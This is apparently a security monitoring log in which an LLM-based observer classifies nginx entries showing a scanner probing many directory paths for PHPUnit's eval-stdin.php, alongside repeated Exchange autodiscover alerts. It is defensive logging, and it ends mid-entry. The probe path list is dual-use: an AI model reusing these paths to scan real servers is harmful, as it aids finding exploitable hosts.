Line=2026-03-20T13:45:10.015112147Z 101.36.107.228 - - [20/Mar/2026:13:45:10 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.575943 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.575982 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly targeted in probes; shows potential attempt to locate vulnerable PHP tooling Line=2026-03-20T13:45:10.543516121Z 2026/03/20 13:45:10 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101... Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.576049 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:10.543630738Z 101.36.107.228 - - [20/Mar/2026:13:45:10 +0000] "54.200.221.0" "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:31.937782 [observer] Pipeline: processed=5773 pattern_hits=5498 llm_calls=275 llm_errors=3 learned=4 Mar 20 13:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:31.937811 [observer] Patterns: hash=5498 prefix=0 regex=0 contains=0 deny=38 alert=434 suppress=0 misses=275 Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242778 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type= Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242815 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an explicit request to a PHPunit file path (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable phpunit component. Line=2026-03-20T13:45:11.128886433Z 2026/03/20 13:45:11 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.... Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242868 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:11.129113277Z 101.36.107.228 - - [20/Mar/2026:13:45:11 +0000] "54.200.221.0" "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033088 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033129 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path (eval-stdin.php) that typically should not exist on a public web root; could indicate probing for PHP unit framework or misconfiguration. Line=2026-03-20T13:45:11.776728127Z 2026/03/20 13:45:11 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033222 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:11.776728074Z 101.36.107.228 - - [20/Mar/2026:13:45:11 +0000] "54.200.221.0" "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262412 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262447 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log showing an access attempt to a sensitive phpunit script path (eval-stdin.php) which is a common target for PHP unit framework exploits; not confirmed malicious but warrants monitoring. Line=2026-03-20T13:45:12.463911555Z 2026/03/20 13:45:12 [error] 422#422: *750652 open() "/usr/share/nginx/default/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire... Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262499 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:12.464003337Z 101.36.107.228 - - [20/Mar/2026:13:45:12 +0000] "54.200.221.0" "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ... 
Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672415 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit utility path under webroot is a common probe for PHP testing frameworks; indicates potential vulnerability probing or misconfiguration. Line=2026-03-20T13:45:13.128959567Z 2026/03/20 13:45:13 [error] 422#422: *750652 open() "/usr/share/nginx/default/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672548 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:13.129106536Z 101.36.107.228 - - [20/Mar/2026:13:45:13 +0000] "54.200.221.0" "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903322 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type= Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903359 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is a common probe for phpunit-related vulnerabilities. Line=2026-03-20T13:45:13.690254490Z 2026/03/20 13:45:13 [error] 422#422: *750652 open() "/usr/share/nginx/default/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory... 
Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903411 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:13.690348771Z 101.36.107.228 - - [20/Mar/2026:13:45:13 +0000] "54.200.221.0" "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:01.950961 [observer] Pipeline: processed=5784 pattern_hits=5504 llm_calls=280 llm_errors=3 learned=4 Mar 20 13:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:01.950992 [observer] Patterns: hash=5504 prefix=0 regex=0 contains=0 deny=43 alert=434 suppress=0 misses=280 Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.236943 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.236995 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a phpunit file path via nginx, which is a common probe for known vulnerabilities or misconfigurations. Line=2026-03-20T13:45:14.263149323Z 2026/03/20 13:45:14 [error] 422#422: *750652 open() "/usr/share/nginx/default/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.237053 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:14.263273073Z 101.36.107.228 - - [20/Mar/2026:13:45:14 +0000] "54.200.221.0" "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462354 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462394 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a sensitive phpunit file suggests probing for remote code execution vulnerabilities. Line=2026-03-20T13:45:14.645628179Z 2026/03/20 13:45:14 [error] 422#422: *750652 open() "/usr/share/nginx/default/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo... Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462457 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:14.645776757Z 101.36.107.228 - - [20/Mar/2026:13:45:14 +0000] "54.200.221.0" "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.461945 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.461985 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path is a common probe vector for automated attacks; could indicate an attempted exploit targeting phpunit. 
Line=2026-03-20T13:45:15.198522595Z 2026/03/20 13:45:15 [error] 422#422: *750652 open() "/usr/share/nginx/default/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct... Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.462036 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:15.198583333Z 101.36.107.228 - - [20/Mar/2026:13:45:15 +0000] "54.200.221.0" "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-... Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.462143 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:15.722585549Z 101.36.107.228 - - [20/Mar/2026:13:45:15 +0000] "54.200.221.0" "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618141 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618208 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access to a PHP unit testing file under V2/vendor/phpunit was attempted, which is a common probe for PHP unit exposure; module open() failure indicates missing file but the path suggests an attempted exploit vector. 
Line=2026-03-20T13:45:15.722585546Z 2026/03/20 13:45:15 [error] 422#422: *750652 open() "/usr/share/nginx/default/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory... Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618260 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:16.276342391Z 101.36.107.228 - - [20/Mar/2026:13:45:16 +0000] "54.200.221.0" "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-... Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.312713 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type= Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.312747 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHPunit test file paths (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable components. Line=2026-03-20T13:45:16.276283932Z 2026/03/20 13:45:16 [error] 422#422: *750652 open() "/usr/share/nginx/default/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct... 
Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.935922 [observer] Pipeline: processed=5796 pattern_hits=5511 llm_calls=285 llm_errors=3 learned=4 Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.935949 [observer] Patterns: hash=5511 prefix=0 regex=0 contains=0 deny=48 alert=434 suppress=0 misses=285 Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617393 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617429 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like request targeting phpunit path (eval-stdin.php) suggests attempted exploitation or vulnerability scanning. Line=2026-03-20T13:45:16.789549920Z 2026/03/20 13:45:16 [error] 422#422: *750652 open() "/usr/share/nginx/default/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo... Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617479 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:16.789723226Z 101.36.107.228 - - [20/Mar/2026:13:45:16 +0000] "54.200.221.0" "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760396 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760440 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is commonly associated with automated probes for known vulnerabilities; not successful but warrants attention. Line=2026-03-20T13:45:17.244193113Z 2026/03/20 13:45:17 [error] 422#422: *750652 open() "/usr/share/nginx/default/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire... Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760494 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:17.244264857Z 101.36.107.228 - - [20/Mar/2026:13:45:17 +0000] "54.200.221.0" "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ... Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720184 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type= Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720237 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path under /vendor/phpunit/phpunit, a common vector for exploiting PHP applications. 
The log shows an error opening a potentially sensitive file, indicating probing activity. Line=2026-03-20T13:45:18.009740425Z 2026/03/20 13:45:18 [error] 422#422: *750652 open() "/usr/share/nginx/default/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720297 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:18.009825497Z 101.36.107.228 - - [20/Mar/2026:13:45:18 +0000] "54.200.221.0" "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260614 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260664 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request appears to target a phpunit path that is commonly exploited to locate sensitive test infrastructure; the error shows a missing file, which may indicate probing or attempted access to restricted resources. Line=2026-03-20T13:45:18.699859034Z 2026/03/20 13:45:18 [error] 422#422: *750652 open() "/usr/share/nginx/default/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo... Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260716 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:18.699857054Z 101.36.107.228 - - [20/Mar/2026:13:45:18 +0000] "54.200.221.0" "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401080 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401138 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a PHP unit test file (eval-stdin.php) under the cms/vendor/phpunit path suggests probing for phpunit exploit vectors; common in automated vulnerability scans. Line=2026-03-20T13:45:19.164688064Z 2026/03/20 13:45:19 [error] 422#422: *750652 open() "/usr/share/nginx/default/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401211 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:19.164715812Z 101.36.107.228 - - [20/Mar/2026:13:45:19 +0000] "54.200.221.0" "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641411 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.75 action=deny pattern_type= Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641453 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly abused in automated attacks; indicates probing for vulnerable PHP unit files. Line=2026-03-20T13:45:19.867198107Z 2026/03/20 13:45:19 [error] 422#422: *750652 open() "/usr/share/nginx/default/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641504 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:19.867339766Z 101.36.107.228 - - [20/Mar/2026:13:45:19 +0000] "54.200.221.0" "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:01.956555 [observer] Pipeline: processed=5808 pattern_hits=5517 llm_calls=291 llm_errors=3 learned=4 Mar 20 13:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:01.956583 [observer] Patterns: hash=5517 prefix=0 regex=0 contains=0 deny=54 alert=434 suppress=0 misses=291 Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107341 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107379 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "pid" seen in 51/86 lines, example: "422#422:" → "" Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107395 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like access to phpunit path in nginx error log; indicates potential vulnerability scan Line=2026-03-20T13:45:20.578351604Z 2026/03/20 13:45:20 [error] 422#422: *750652 open() "/usr/share/nginx/default/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct... Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107448 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:20.578577986Z 101.36.107.228 - - [20/Mar/2026:13:45:20 +0000] "54.200.221.0" "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-... Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684240 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684280 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a known phpunit path may indicate probing for local code execution vulnerabilities. Line=2026-03-20T13:45:21.185787660Z 2026/03/20 13:45:21 [error] 422#422: *750652 open() "/usr/share/nginx/default/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc... Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684336 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:21.185913965Z 101.36.107.228 - - [20/Mar/2026:13:45:21 +0000] "54.200.221.0" "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "... Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032581 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032624 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit path suggests probing for known PHP unit vulnerabilities. 
Line=2026-03-20T13:45:21.835833096Z 2026/03/20 13:45:21 [error] 422#422: *750652 open() "/usr/share/nginx/default/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo... Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032677 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:21.835913617Z 101.36.107.228 - - [20/Mar/2026:13:45:21 +0000] "54.200.221.0" "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.935931 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.68 action=alert pattern_type= Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.935974 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error shows an attempt to access a PHP unit test file (phpunit) which is uncommon in normal traffic and could indicate probing for test artifacts. Line=2026-03-20T13:45:22.291289754Z 2026/03/20 13:45:22 [error] 422#422: *750652 open() "/usr/share/nginx/default/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such fil... Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.936032 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request 